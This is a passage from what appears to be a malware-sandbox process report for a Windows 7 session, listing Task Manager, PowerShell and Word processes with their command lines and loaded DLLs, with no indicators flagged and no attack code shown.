c:\windows\system32\winnsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\credssp.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\webio.dll
c:\windows\system32\wship6.dll

PID
1292
CMD
"C:\Windows\system32\taskmgr.exe" /4
Path
C:\Windows\system32\taskmgr.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Task Manager
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\usp10.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\credui.dll
c:\windows\system32\vdmdbg.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\lpk.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\taskmgr.exe
c:\windows\system32\sechost.dll
c:\windows\system32\slc.dll
c:\windows\system32\pcwum.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\user32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ctfmon.exe
c:\windows\system32\dwm.exe
c:\windows\system32\taskeng.exe
c:\windows\system32\utildll.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\taskhost.exe
c:\windows\system32\netutils.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\samcli.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\browcli.dll
c:\windows\system32\version.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\propsys.dll
c:\windows\system32\srvcli.dll
c:\windows\explorer.exe
c:\windows\system32\audiodg.exe
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\userenv.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\mpr.dll

PID
3360
CMD
"C:\Windows\system32\taskmgr.exe" /1
Path
C:\Windows\system32\taskmgr.exe
Indicators
Parent process
taskmgr.exe
User
admin
Integrity Level
HIGH
Version:
Company
Microsoft Corporation
Description
Windows Task Manager
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sechost.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\user32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\vdmdbg.dll
c:\windows\system32\ole32.dll
c:\windows\system32\taskmgr.exe
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\credui.dll
c:\windows\system32\usp10.dll
c:\windows\system32\pcwum.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\slc.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\devobj.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\csrss.exe
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntoskrnl.exe
c:\windows\system32\utildll.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\smss.exe
c:\windows\system32\srvcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\lsass.exe
c:\windows\system32\netapi32.dll
c:\windows\system32\version.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\winsta.dll
c:\windows\system32\netutils.dll
c:\windows\system32\winlogon.exe
c:\windows\system32\wininit.exe
c:\windows\system32\services.exe
c:\windows\system32\browcli.dll
c:\windows\system32\lsm.exe
c:\windows\system32\svchost.exe
c:\windows\system32\spoolsv.exe
c:\windows\system32\dwm.exe
c:\windows\system32\dllhost.exe
c:\windows\explorer.exe
c:\windows\system32\searchindexer.exe
c:\windows\system32\searchfilterhost.exe
c:\windows\system32\ctfmon.exe
c:\windows\system32\taskhost.exe
c:\program files\common files\microsoft shared\ime14\shared\imedictupdate.exe
c:\windows\system32\taskeng.exe
c:\windows\system32\propsys.dll
c:\windows\system32\searchprotocolhost.exe
c:\windows\system32\audiodg.exe
c:\windows\system32\conhost.exe
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\program files\microsoft office\office14\winword.exe
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe

PID
1108
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\b87bb509-d7e5-4eef-9c5e-545e6cb556f4.ps1"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\devobj.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\atl.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\lpk.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\userenv.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\slc.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\normaliz.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\msisip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\wshext.dll
c:\windows\system32\nsi.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\ws2_32.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\crypt32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\system32\urlmon.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.security\4c1bdc03e699ab178db76a938fce6bc1\system.security.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.drawing\ce11900fa489575613dc777c7fbb0d7d\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pae3498d9#\e8948a2d96b83812948847619fc784bc\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\sxs.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\netutils.dll

PID
1764
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\familiesfees.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\lpk.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\imm32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msi.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\shell32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wtsapi32.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\shlwapi.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\propsys.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\winspool.drv
c:\windows\system32\clbcatq.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\version.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\profapi.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\userenv.dll
c:\program files\microsoft office\office14\genko.dll
c:\windows\system32\secur32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\sxs.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\prntvpt.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\ntshrui.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\slc.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\linkinfo.dll
c:\program files\common files\microsoft shared\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\vba\vba7\1033\vbe7intl.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\netutils.dll

PID
1364
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\dogclear.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\windows\system32\ole32.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\lpk.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\wtsapi32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\advapi32.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\windows\system32\msi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\usp10.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\user32.dll
c:\windows\system32\msimg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\oleaut32.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\propsys.dll
c:\windows\system32\profapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\version.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\winspool.drv
c:\windows\system32\clbcatq.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\program files\microsoft office\office14\genko.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\sxs.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\userenv.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\secur32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\prntvpt.dll
c:\windows\system32\msxml3.dll
c:\program files\common files\microsoft shared\vba\vba7\vbe7.dll
c:\windows\system32\slc.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\program files\common files\microsoft shared\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\linkinfo.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\program files\common files\microsoft shared\proof\mslid.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\netutils.dll

PID
2464
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\eventsebay.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\windows\system32\ntdll.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\msimg32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\lpk.dll
c:\windows\system32\imm32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\shell32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\advapi32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\usp10.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\version.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\devobj.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\profapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\winspool.drv
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\mscoree.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\uxtheme.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\userenv.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sxs.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\program files\microsoft office\office14\genko.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\sspicli.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\prntvpt.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\slc.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\linkinfo.dll
c:\program files\common files\microsoft shared\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\vba\vba7\1033\vbe7intl.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\program files\common files\microsoft shared\proof\mslid.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\netutils.dll

PID
1856
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\charlescase.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\lpk.dll
c:\windows\system32\apphelp.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\imm32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msi.dll
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cfgmgr32.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\cryptsp.dll
